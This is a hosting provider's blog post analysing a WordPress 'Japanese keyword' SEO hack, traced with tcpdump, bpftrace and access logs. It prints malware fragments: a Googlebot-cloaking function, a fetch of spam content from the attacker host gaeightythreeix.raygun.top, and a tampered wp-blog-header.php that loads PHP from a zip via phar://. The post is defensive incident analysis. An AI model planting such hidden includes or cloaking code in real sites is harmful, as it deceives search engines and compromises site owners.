Infiniroot Blog: We sometimes write, too.

Of course we cannot always share details about our work with customers, but nevertheless it is nice to show our technical achievements and share some of our implemented solutions.

Wordpress (Japanese SEO) hack extracting and executing code from uploaded ZIP file

Published on August 26th 2022


Wordpress is currently the world's most used web application CMS. It is therefore no surprise that Wordpress installations are attacked very often. While the way an attacker gets access to the file system is almost always identical (either by using a security vulnerability or by using an existing login with weak or brute-forced credentials), the steps afterwards are different.

Some of the attackers might just upload some scripts sending out thousands of spam e-mails. Others might execute scripts and processes which attack other Wordpress installations. Yet others manipulate the content of the Wordpress pages. There are many possibilities of what a successful attacker could do with a hacked Wordpress site.

This hack, which we have discovered in the past couple of days, is something we haven't seen before and thus worthy to write about. But let's start at the beginning.

Japanese characters are showing up on Google in search results

It all started with something very strange. The affected website, running Wordpress 6.x, suddenly appeared with oriental (Japanese) characters in Google search results.

Japanese characters show up in Google results of hacked Wordpress site

At first no hack was suspected. Maybe the site in question runs multi-language and there was an issue with a SEO plugin? Or could it be something else?

Note: A quick research pointed to a "Japanese keyword hack", described on web.dev. Although the site describes similar symptoms, no (technical) information is available explaining how this hack works and where the malicious files are located.

However a manual request on the Wordpress site revealed something very interesting. A curl command shows that the correct and expected content is loaded. But when the user-agent was changed to Googlebot (-A "Googlebot”), the response body changed:

Different HTTP response with Japanese characters when using Googlebot as User-Agent

A completely different content in Japanese is loaded in this situation. By opening one of the mentioned local links (/4244wpjv43a.html), we can indeed see a Japanese page including pictures showing up:

A page with Japanese content is showing on the Wordpress site

Time to dig deeper to find out where this is coming from.

Malware scanners find nothing

A hacked Wordpress. Been there, done that, as we offer this kind of remote server troubleshooting/analysis to our customers. Our first guess was a manipulated or additional plugin installed by the attacker. Usually malicious code can be found quickly by using malware scanners, such as php-malware-scanner. Although there were a couple of results hinting to malicious code, after examining each file they all turned out to be false positives.

Could the Japanese content be in the database? But even scraping through the database dump did not reveal any Japanese content, let alone manipulated posts. 

A grep, using multiple words found in the response body, through all files inside the Wordpress installation did not show any results either. 

Where does this content come from?! We are definitely scratching our heads at this time.

Tcpdump shows external HTTP GET - on every request

We decided to switch gears and change focus to the network. Is there any unusual (outgoing) network activity happening whenever a request arrives on the Wordpress site? We fired up tcpdump and listened on the Internet-facing interface. And indeed, a couple of seconds later we were faced with some promising results.

root@wordpress:~# tcpdump -i eth0 port 80 -X
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
17:54:54.399661 IP www.example.com.43018 > 173.208.198.115.http: Flags [S], seq 3867413820, win 64240, options [mss 1460,sackOK,TS val 3891515490 ecr 0,nop,wscale 7], length 0
    0x0000:  4500 003c bb3f 4000 4006 ad18 2d4d 30d3  E..<.?@.@...-M0.
    0x0010:  add0 c673 a80a 0050 e684 0d3c 0000 0000  ...s...P...<....
    0x0020:  a002 faf0 d292 0000 0204 05b4 0402 080a  ................
    0x0030:  e7f3 d062 0000 0000 0103 0307            ...b........
17:54:54.595456 IP 173.208.198.115.http > www.example.com.43018: Flags [S.], seq 3526600846, ack 3867413821, win 28960, options [mss 1460,sackOK,TS val 879320330 ecr 3891515490,nop,wscale 7], length 0
    0x0000:  4500 003c 0000 4000 3206 7658 add0 c673  E..<..@.2.vX...s
    0x0010:  2d4d 30d3 0050 a80a d233 a88e e684 0d3d  -M0..P...3.....=
    0x0020:  a012 7120 a3c2 0000 0204 05b4 0402 080a  ..q.............
    0x0030:  3469 5d0a e7f3 d062 0103 0307            4i]....b....
17:54:54.595540 IP www.example.com.43018 > 173.208.198.115.http: Flags [.], ack 1, win 502, options [nop,nop,TS val 3891515686 ecr 879320330], length 0
    0x0000:  4500 0034 bb40 4000 4006 ad1f 2d4d 30d3  E..4.@@.@...-M0.
    0x0010:  add0 c673 a80a 0050 e684 0d3d d233 a88f  ...s...P...=.3..
    0x0020:  8010 01f6 d28a 0000 0101 080a e7f3 d126  ...............&
    0x0030:  3469 5d0a                                4i].
17:54:54.595657 IP www.example.com.43018 > 173.208.198.115.http: Flags [P.], seq 1:168, ack 1, win 502, options [nop,nop,TS val 3891515686 ecr 879320330], length 167: HTTP: GET /indexnew.php?web=www.example.com&zz=1&uri=LzgwMDFreGtyZmF5YjAuaHRtbA==&urlshang=&http=https&lang= HTTP/1.1
    0x0000:  4500 00db bb41 4000 4006 ac77 2d4d 30d3  E....A@.@..w-M0.
    0x0010:  add0 c673 a80a 0050 e684 0d3d d233 a88f  ...s...P...=.3..
    0x0020:  8018 01f6 d331 0000 0101 080a e7f3 d126  .....1.........&
    0x0030:  3469 5d0a 4745 5420 2f69 6e64 6578 6e65  4i].GET./indexne
    0x0040:  772e 7068 703f 7765 623d 7777 772e 7065  w.php?web=www.ex
    0x0050:  7265 6e6e 6961 6c2e 6e65 742e 6175 267a  ample.com&z
    0x0060:  7a3d 3126 7572 693d 4c7a 6777 4d44 4672  z=1&uri=LzgwMDFr
    0x0070:  6547 7479 5a6d 4635 596a 4175 6148 5274  eGtyZmF5YjAuaHRt
    0x0080:  6241 3d3d 2675 726c 7368 616e 673d 2668  bA==&urlshang=&h
    0x0090:  7474 703d 6874 7470 7326 6c61 6e67 3d20  ttp=https&lang=.
    0x00a0:  4854 5450 2f31 2e31 0d0a 486f 7374 3a20  HTTP/1.1..Host:.
    0x00b0:  6761 6569 6768 7479 7468 7265 6569 782e  gaeightythreeix.
    0x00c0:  7261 7967 756e 2e74 6f70 0d0a 4163 6365  raygun.top..Acce
    0x00d0:  7074 3a20 2a2f 2a0d 0a0d 0a              pt:.*/*....
17:54:54.791643 IP 173.208.198.115.http > www.example.com.43018: Flags [.], ack 168, win 235, options [nop,nop,TS val 879320526 ecr 3891515686], length 0
    0x0000:  4500 0034 f541 4000 3206 811e add0 c673  E..4.A@.2......s
    0x0010:  2d4d 30d3 0050 a80a d233 a88f e684 0de4  -M0..P...3......
    0x0020:  8010 00eb 4095 0000 0101 080a 3469 5dce  ....@.......4i].
    0x0030:  e7f3 d126                                ...&
17:54:54.800227 IP 173.208.198.115.http > www.example.com.43018: Flags [.], seq 1:2897, ack 168, win 235, options [nop,nop,TS val 879320534 ecr 3891515686], length 2896: HTTP: HTTP/1.1 200 OK

Tcpdump reveals that a HTTP request was sent to the domain gaeightythreeix.raygun.top, using an URL /indexnew.php and sending GET parameters containing the domain of this Wordpress installation.

The Japanese content: It comes from a remote server!

By following this external domain and opening up the same URL in the browser shows the same Japanese content.

Japanese content is loaded from an external server

Depending on the GET parameters the content is (randomly?) adjusted and shows a different product. Here the "web” parameter is adjusted to some other domain and the content changes:

Japanese content changes depending on the GET parameters

With this information we now know that the content is loaded from an external URL and "placed” on top of the Wordpress site. Now it makes sense we were not able to grep anything relating to the content - neither in the database nor in the Wordpress files. 

But at this point we still do not know which script or plugin is loading the content from gaeightythreeix.raygun.top. Even a grep for this domain did not reveal the responsible file!

File tracing using bpftrace

We decided to open up the big arsenal now. To identify all the files which are opened ((sys_enter_openat) on each request to this Wordpress site, we used bpftrace, a very powerful tool to catch syscalls from the Linux Kernel, comparable to dtrace on Solaris. The hope was to catch anything out of the ordinary, although a Wordpress with a lot of plugins shows a lot of opened files in the output. To reduce the output to only PHP processes, we used bpftrace with the /comm = "php-fpm7.4”/ filter. And we weren't disappointed!

root@wordpress:~# bpftrace -e 'tracepoint:syscalls:sys_enter_openat /comm == "php-fpm7.4"/ { printf("%s %s\n", comm, str(args->filename)); }'
Attaching 1 probe…
[...]
php-fpm7.4 /var/www/www.example.com/wp-content/plugins/bridge-core/module
php-fpm7.4 /var/www/www.example.com/wp-content/plugins/bridge-core/module
php-fpm7.4 /var/www/www.example.com/wp-content/plugins/bridge-core/module
php-fpm7.4 /var/www/www.example.com/wp-content/plugins/bridge-core/module
php-fpm7.4 /var/www/www.example.com/wp-content/plugins/bridge-core/module
php-fpm7.4 /var/www/www.example.com/wp-content/uploads/2021/index.zip
php-fpm7.4 /etc/hosts
[...]

Of course the zip file caught our interest as we didn't expect a zip file to show up in the list of opened files. And to our surprise the zip file popped up on every HTTP request on the affected Wordpress site. Let's take a closer look at this zip file.

Malicious PHP code inside the ZIP file

According to the timestamp, the zip file was uploaded a couple of days ago:

root@wordpress:~# ls -la /var/www/www.example.com/wp-content/uploads/2021/index.zip
-rw-r--r-- 1 www-data www-data 1922 Aug 16 19:39 /var/www/www.example.com/wp-content/uploads/2021/index.zip

Inside the index.zip file a file index.php can be found:

root@wordpress:~# unzip /var/www/www.example.com/wp-content/uploads/2021/index.zip -d /tmp/claudio
Archive:  /var/www/www.example.com/wp-content/uploads/2021/index.zip
  inflating: /tmp/claudio/index.php

root@wordpress:~# cd /tmp/claudio
root@wordpress:/tmp/claudio# ls -la
total 44
drwxr-xr-x  2 root root  4096 Aug 22 19:01 ./
drwxrwxrwt 24 root root 32768 Aug 22 19:01 ../
-rw-r--r--  1 root root  6058 Aug 16 14:18 index.php

Taking a look at this index.php file finally reveals the malicious code which loads the Japanese content from an external site.

PHP code responsible for Japanese keyword/SEO hack

The file contains 173 lines. Let's look at the most important code snippets.

Almost at the top we can spot the $xmlname variable, containing a couple of characters. By running urldecode() on $xmlname we get the following string: tnrvtuglguerrvk.enltha.gbc.
By running this string through the str_rot13() function, we obtain the following string: gaeightythreeix.raygun.top.

Sounds familiar, right? This is the external domain used to load the Japanese contents and is saved as $goweb variable inside the script.

Later on in this script is the actual content retrieval from the external URL:

$web = $http_web . '://' . $goweb . '/indexnew.php?web=' . $host . '&zz=' . disbot() . '&uri=' . $duri . '&urlshang=' . $urlshang . '&http=' . $http . '&lang=' . $lang;
$html_content = trim(doutdo($web));

And a few lines further down we can find a function disbot() which reads the HTTP User-Agent from the HTTP request:

function disbot()
{
    $uAgent = strtolower($_SERVER['HTTP_USER_AGENT']);
    if (stristr($uAgent, 'googlebot') || stristr($uAgent, 'bing') || stristr($uAgent, 'yahoo') || stristr($uAgent, 'google') || stristr($uAgent, 'Googlebot') || stristr($uAgent, 'googlebot')) {
        return true;
    } else {
        return false;
    }
}

This function is responsible for handling different user agents and showing different contents, depending on the User-Agent. Remember the curl -A "Googlebot” at the beginning? This is what triggered this function to return true and reveal the Japanese content.

Alright, we have now identified the malicious code, which is loaded from within a zip file at every request on this Wordpress site. But we haven't yet found the script which actually loads and reads the content from the zip file.

Wordpress include content from phar archive

After yet another research across all files we focused on the "zip” extension this time. And promptly we found another manipulated file: wp-blog-header.php. This PHP script is part of the original Wordpress installation but was modified by the hacker:

root@wordpress:~# cat /var/www/www.example.com/wp-blog-header.php
<?php
/**
 * Loads the WordPress environment and template.
 *
 * @package WordPress
 */

if ( ! isset( $wp_did_header ) ) {

    $wp_did_header = true;

    // Load the WordPress library.
    require_once __DIR__ . '/wp-load.php';
    $file = 'index';
    $upload_dir = wp_upload_dir();
    $folder = $upload_dir['basedir'] . "/2021/$file.zip/$file.php";
    include('phar://'.$folder);


    // Set up the WordPress query.
    wp();

    // Load the theme template.
    require_once ABSPATH . WPINC . '/template-loader.php';

}

Note: The manipulated (added) code was highlighted in the above output. 

The wp-blog-header.php file is loaded on every request of Wordpress and was modified to load content (include) from a phar archive, pointing to, surprise surprise, the index.zip file!

To be honest, until this day I personally didn't even know you could include a zipped PHP code on the fly using the PHP phar:// extension. This is certainly a very unique and interesting approach!

And it proved to be very effective, because malware scanners are mainly focusing on typical code snippets using functions such as base64_decode() or variables using nested variables as value.

We have now understood how this Japanese SEO hack works, technically speaking. But we do not know yet how this zip file was uploaded and how wp-blog-header.php was modified.

Tracing the origin: A successful login

At this point we are back to the very first part of this article: What is the entry point? Was it a vulnerability in Wordpress or one of its plugins or themes? Or was a Wordpress account cracked and used to do the manipulations?

By tracing the access logs to more or less the time the zip file was created, we could find the following HTTP request, uploading the index.zip file using the wp_file_manager plugin:

204.188.232.195 - - [16/Aug/2022:19:39:40 +1000] "GET /wp-admin/admin-ajax.php?action=mk_file_folder_manager&_wpnonce=f2d6e6cb20&networkhref=&cmd=ls&target=l1_d3AtY29udGVudC91cGxvYWRzLzIwMjE&intersect%5B%5D=index.zip&reqid=182a605e43a334&_fs_blog_admin=true HTTP/2.0" 200 11 "https://www.example.com/wp-admin/admin.php?page=wp_file_manager" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"

Taking a closer look at the requests from this IP, shows the installation of wp_file_manager plugin a few minutes earlier:

204.188.232.195 - - [16/Aug/2022:19:36:12 +1000] "POST /wp-admin/admin-ajax.php?_fs_blog_admin=true HTTP/2.0" 200 9103 "https://www.example.com/wp-admin/admin.php?page=wp_file_manager" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"

This plugin was then used to upload the zip file (we already knew that) but also to modify the wp-blog-header.php file:

204.188.232.195 - - [16/Aug/2022:19:39:50 +1000] "GET /wp-admin/admin-ajax.php?action=mk_file_folder_manager&_wpnonce=f2d6e6cb20&networkhref=&cmd=ls&target=l1_Lw&intersect%5B%5D=wp-blog-header.php&reqid=182a6060bc3343&_fs_blog_admin=true HTTP/2.0" 200 81 "https://www.example.com/wp-admin/admin.php?page=wp_file_manager" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"

Tracing the requests back to the very first requests shows a successful login (without any prior brute-force attack, from this IP anyway) on the Wordpress backend:

204.188.232.195 - - [16/Aug/2022:19:33:42 +1000] "GET /wp-login.php HTTP/2.0" 200 2253 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"

204.188.232.195 - - [16/Aug/2022:19:34:11 +1000] "POST /wp-login.php HTTP/2.0" 200 2300 "https://www.example.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"

204.188.232.195 - - [16/Aug/2022:19:35:05 +1000] "POST /wp-login.php HTTP/2.0" 302 0 "https://www.example.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"

204.188.232.195 - - [16/Aug/2022:19:35:08 +1000] "GET /wp-admin/ HTTP/2.0" 200 71258 "https://perennial.net.au/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"

It took the attacker two attempts to successfully login into the Wordpress backend. The fact that it took a couple of seconds between actually entering the credentials could mean the password was looked up somewhere on a list and copied from there. This means: The password was known. It could either be a password retrieved from a past data breach with leaked passwords and the same password was used by this user on this Wordpress or it could also be a trojan or password sniffer on the user's computer.

TL;DR: This is the Japanese keyword/SEO hack

The Japanese keyword/SEO hack is a hack where a Wordpress installation gets manipulated to load external (Japanese) content for specific user agents, such as Google Bot. The goal is most likely to trick Google's bots and manipulate Google's search results for certain products.

The PHP code responsible for loading the external contents on top of Wordpress is loaded from a ZIP file, dynamically unpacked and included on every request, using the PHP phar class to handle archives. 

That type of hack, using a zip file dynamically loaded was new to us so it was difficult to detect it. Also malware scanners might not yet be aware of that type of code inclusion and it might take some time until malware scanners know what to look for.

Technically speaking a very nicely executed and well hidden hack. However, in this case, it was only made possible by using an insecure or leaked password from an existing Wordpress user, which would have been avoidable.